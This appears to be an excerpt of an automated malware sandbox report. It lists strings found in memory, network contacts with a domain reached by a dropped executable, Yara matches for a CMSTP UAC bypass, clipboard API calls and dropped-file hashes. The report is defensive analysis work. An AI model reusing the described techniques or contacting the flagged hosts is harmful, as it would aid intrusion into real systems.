Source: thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000002.2457636167.0000000000A3C000.00000002.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000000.2341233312.0000000000A3C000.00000002.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000009.00000002.2633767653.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000009.00000000.2456623788.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824396788.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000002.2988595385.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://www.mozilla.org/rdf/chrome#platformPackage
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://www.mozilla.org/unix/customizing.html#prefs
Source: thunderbird.exe, 00000008.00000002.2457636167.0000000000A3C000.00000002.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000000.2341233312.0000000000A3C000.00000002.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000009.00000002.2633767653.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000009.00000000.2456623788.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824396788.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000002.2988595385.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://www.netscape.com/newsref/std/cookie_spec.html
Source: thunderbird.exe, 00000008.00000002.2459567914.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636199629.0000000003C82000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2989949247.0000000003C71000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.softwareok.com
Source: cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000000.2849595482.00000001401F4000.00000002.00000001.01000000.0000002B.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.softwareok.com/?Download=Find.Same.Images.OK
Source: cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000000.2849595482.00000001401F4000.00000002.00000001.01000000.0000002B.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.softwareok.com/?Freeware/Find.Same.Images.OK
Source: cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000000.2849595482.00000001401F4000.00000002.00000001.01000000.0000002B.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.softwareok.com/?Freeware/Find.Same.Images.OK/History
Source: cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000000.2849595482.00000001401F4000.00000002.00000001.01000000.0000002B.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.softwareok.com/?seite=faq-Find.Same.Images.OK&faq=0
Source: thunderbird.exe, 00000008.00000002.2459567914.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636199629.0000000003C82000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2989949247.0000000003C71000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.softwareok.de
Source: cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000000.2849595482.00000001401F4000.00000002.00000001.01000000.0000002B.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.softwareok.de/?Download=Find.Same.Images.OK
Source: cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000000.2849595482.00000001401F4000.00000002.00000001.01000000.0000002B.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.softwareok.de/?Freeware/Find.Same.Images.OK
Source: cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000000.2849595482.00000001401F4000.00000002.00000001.01000000.0000002B.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.softwareok.de/?Freeware/Find.Same.Images.OK/History
Source: cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000000.2849595482.00000001401F4000.00000002.00000001.01000000.0000002B.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.softwareok.de/?seite=faq-Find.Same.Images.OK&faq=0
Source: Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.surfok.de/
Source: thunderbird.exe, 00000008.00000002.2459567914.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636199629.0000000003C82000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2989949247.0000000003C71000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/cps0(
Source: thunderbird.exe, 00000008.00000002.2459567914.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636199629.0000000003C82000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2989949247.0000000003C71000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/rpa00
Source: thunderbird.exe, 00000008.00000002.2459567914.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636199629.0000000003C82000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2989949247.0000000003C71000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0
Source: thunderbird.exe, 00000008.00000002.2459567914.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636199629.0000000003C82000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2989949247.0000000003C71000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0/
Source: powershell.exe, 00000001.00000002.2119626367.00000000043F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: Qjsync.exe, 00000011.00000003.3019877415.000000000061C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://amenstilo.website/
Source: Qjsync.exe, 00000011.00000002.3020333997.000000000061C000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000003.3019877415.000000000061C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://amenstilo.website/4o
Source: Qjsync.exe, 00000011.00000002.3020333997.000000000061C000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000003.3019604424.000000000061C000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000003.3019877415.000000000061C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://amenstilo.website/Ho
Source: Qjsync.exe, 00000011.00000003.3019604424.000000000061C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://amenstilo.website/Lo
Source: Qjsync.exe, 00000011.00000002.3020333997.000000000061C000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000003.3019604424.000000000061C000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000003.3019877415.000000000061C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://amenstilo.website/To
Source: Qjsync.exe, 00000011.00000003.3019877415.0000000000603000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://amenstilo.website/courtney_ryley_cooper_biography.html?jobjbyy11iib4wpr=h3593GdmUsLiBsC%2Fsj
Source: Qjsync.exe, 00000011.00000003.3013672743.000000000061C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://amenstilo.website/po
Source: Qjsync.exe, 00000011.00000003.3013672743.000000000061C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://amenstilo.website/xo
Source: Qjsync.exe, 00000011.00000003.3017950213.000000000062F000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000003.3018198100.000000000062F000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000003.3013672743.000000000062F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://amenstilo.website:443
Source: Qjsync.exe, 00000011.00000003.3009110415.000000000062F000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000003.3010434018.000000000062F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://amenstilo.website:443fz
Source: Qjsync.exe, 00000011.00000003.3009110415.000000000062F000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000003.3010434018.000000000062F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://amenstilo.website:443g
Source: Qjsync.exe, 00000011.00000003.3017950213.000000000062F000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000003.3018198100.000000000062F000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000003.3013672743.000000000062F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://amenstilo.website:443llt
Source: powershell.exe, 00000001.00000002.2122542070.0000000005457000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.2122542070.0000000005457000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.2122542070.0000000005457000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: thunderbird.exe, 00000008.00000002.2459567914.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636199629.0000000003C82000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2989949247.0000000003C71000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: thunderbird.exe, 00000008.00000002.2459567914.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636199629.0000000003C82000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2989949247.0000000003C71000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: MiJZ3z4t5K.exe, 00000000.00000002.3344787379.000000000319F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://download.binance.com
Source: MiJZ3z4t5K.exe, 00000000.00000002.3344787379.000000000319F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://download.binance.com/electron-desktop/windows/production/binance-setup.exe
Source: svchost.exe, 0000000D.00000003.2677822907.0000020221A4E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 0000000D.00000003.2677822907.00000202219F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: powershell.exe, 00000001.00000002.2119626367.0000000004546000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2122542070.0000000005457000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: thunderbird.exe, 00000008.00000002.2459567914.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2636199629.0000000003C82000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, thunderbird.exe, 00000010.00000002.2989949247.0000000003C71000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: cmd.exe, 0000000B.00000002.2920093047.000000000536C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 00000011.00000002.3021047369.00000000026A0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443

Source: unknown

HTTPS traffic detected: 52.222.214.90:443 -> 192.168.2.6:49737 version: TLS 1.2

Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe

Code function: 7_2_100250E1 OpenClipboard,EmptyClipboard,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,WideCharToMultiByte,SetClipboardData,SetClipboardData,SetClipboardData,SetClipboardData,CloseClipboard,

7_2_100250E1

Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe

7_2_100250E1

Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe

Code function: 7_2_10024BC2 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z,__EH_prolog3,OpenClipboard,?BeginUndoAction@CellBuffer@@QAEXXZ,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,GetClipboardData,GlobalSize,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,GetClipboardData,GlobalSize,MultiByteToWideChar,CloseClipboard,?EndUndoAction@CellBuffer@@QAEXXZ,

7_2_10024BC2

System Summary

Malicious sample detected (through community Yara rule)

Source: 18.2.cmd.exe.32207f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 18.2.cmd.exe.51c3a00.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 11.2.cmd.exe.53b7acd.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.cmd.exe.50bba00.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 18.2.cmd.exe.52096cd.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.cmd.exe.51016cd.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 24.2.cmd.exe.5100acd.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 18.2.cmd.exe.5208acd.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 17.2.Qjsync.exe.26ebaed.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 17.2.Qjsync.exe.26a6a20.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 11.2.cmd.exe.5372a00.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 17.2.Qjsync.exe.26ec6ed.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 11.2.cmd.exe.53b86cd.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen

Source: C:\Windows\Temp\AppsLo.exe

File deleted: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_041AB490	1_2_041AB490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_041AB470	1_2_041AB470
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_082C3E98	1_2_082C3E98
Source: C:\Windows\Temp\AppsLo.exe	Code function: 6_2_008D001D	6_2_008D001D
Source: C:\Windows\Temp\AppsLo.exe	Code function: 6_2_008C41EA	6_2_008C41EA
Source: C:\Windows\Temp\AppsLo.exe	Code function: 6_2_008A62AA	6_2_008A62AA
Source: C:\Windows\Temp\AppsLo.exe	Code function: 6_2_008D03D5	6_2_008D03D5
Source: C:\Windows\Temp\AppsLo.exe	Code function: 6_2_008CC332	6_2_008CC332
Source: C:\Windows\Temp\AppsLo.exe	Code function: 6_2_008DA560	6_2_008DA560
Source: C:\Windows\Temp\AppsLo.exe	Code function: 6_2_008D07AA	6_2_008D07AA
Source: C:\Windows\Temp\AppsLo.exe	Code function: 6_2_008AA8F1	6_2_008AA8F1
Source: C:\Windows\Temp\AppsLo.exe	Code function: 6_2_008DAA0E	6_2_008DAA0E
Source: C:\Windows\Temp\AppsLo.exe	Code function: 6_2_008CFB89	6_2_008CFB89
Source: C:\Windows\Temp\AppsLo.exe	Code function: 6_2_008D0B6F	6_2_008D0B6F
Source: C:\Windows\Temp\AppsLo.exe	Code function: 6_2_008D2C18	6_2_008D2C18
Source: C:\Windows\Temp\AppsLo.exe	Code function: 6_2_008D2E47	6_2_008D2E47
Source: C:\Windows\Temp\AppsLo.exe	Code function: 6_2_008DEE7C	6_2_008DEE7C
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_00F8001D	7_2_00F8001D
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_00F741EA	7_2_00F741EA
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_00F562AA	7_2_00F562AA
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_00F803D5	7_2_00F803D5
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_00F7C332	7_2_00F7C332
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_00F8A560	7_2_00F8A560
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_00F807AA	7_2_00F807AA
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_00F5A8F1	7_2_00F5A8F1
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_00F8AA0E	7_2_00F8AA0E
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_00F7FB89	7_2_00F7FB89
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_00F80B6F	7_2_00F80B6F
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_00F82C18	7_2_00F82C18
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_00F8EE7C	7_2_00F8EE7C
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_00F82E47	7_2_00F82E47
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_100650D5	7_2_100650D5
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_1007321C	7_2_1007321C
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_10067340	7_2_10067340
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_100655AA	7_2_100655AA
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_1006D6C1	7_2_1006D6C1
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_10073760	7_2_10073760
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_1004D899	7_2_1004D899
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_100358D6	7_2_100358D6
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_1006597E	7_2_1006597E
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_10039CFF	7_2_10039CFF
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_10051D13	7_2_10051D13
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_10025D59	7_2_10025D59
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_10065D8A	7_2_10065D8A
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_1005DDD0	7_2_1005DDD0
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_10073E58	7_2_10073E58
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_10041FD2	7_2_10041FD2
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_100661AA	7_2_100661AA
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_10025D59	7_2_10025D59
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_10062CC0	7_2_10062CC0
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_10072CD8	7_2_10072CD8
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_1002AF28	7_2_1002AF28
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: 7_2_10074F8D	7_2_10074F8D
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	Code function: 8_2_00A1C995	8_2_00A1C995
Source: C:\Windows\Temp\{283DBABD-2529-4833-A804-1C7644FB211C}\.ba\thunderbird.exe	Code function: 8_2_00A1867F	8_2_00A1867F

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\Qjsync.exe B22BF1210B5FD173A210EBFA9092390AA0513C41E1914CBE161EB547F049EF91
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\smomwacaueqiut 72812A162F9450320A80589A4D432BFAB8C168D199D60783E7792705BD3981D7

Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: String function: 00F932F3 appears 83 times
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: String function: 00F90237 appears 683 times
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: String function: 10069ABC appears 45 times
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: String function: 10063D94 appears 77 times
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: String function: 00F53821 appears 501 times
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: String function: 10067974 appears 54 times
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: String function: 00F51F13 appears 54 times
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: String function: 10066D70 appears 196 times
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: String function: 10063CBC appears 110 times
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: String function: 100423D6 appears 34 times
Source: C:\Windows\Temp\{BB1362A0-6A1F-48CD-98E7-9FF49CB04512}\.cr\AppsLo.exe	Code function: String function: 00F90726 appears 34 times
Source: C:\Windows\Temp\AppsLo.exe	Code function: String function: 008E0237 appears 683 times
Source: C:\Windows\Temp\AppsLo.exe	Code function: String function: 008E32F3 appears 83 times
Source: C:\Windows\Temp\AppsLo.exe	Code function: String function: 008A1F13 appears 54 times
Source: C:\Windows\Temp\AppsLo.exe	Code function: String function: 008A3821 appears 501 times
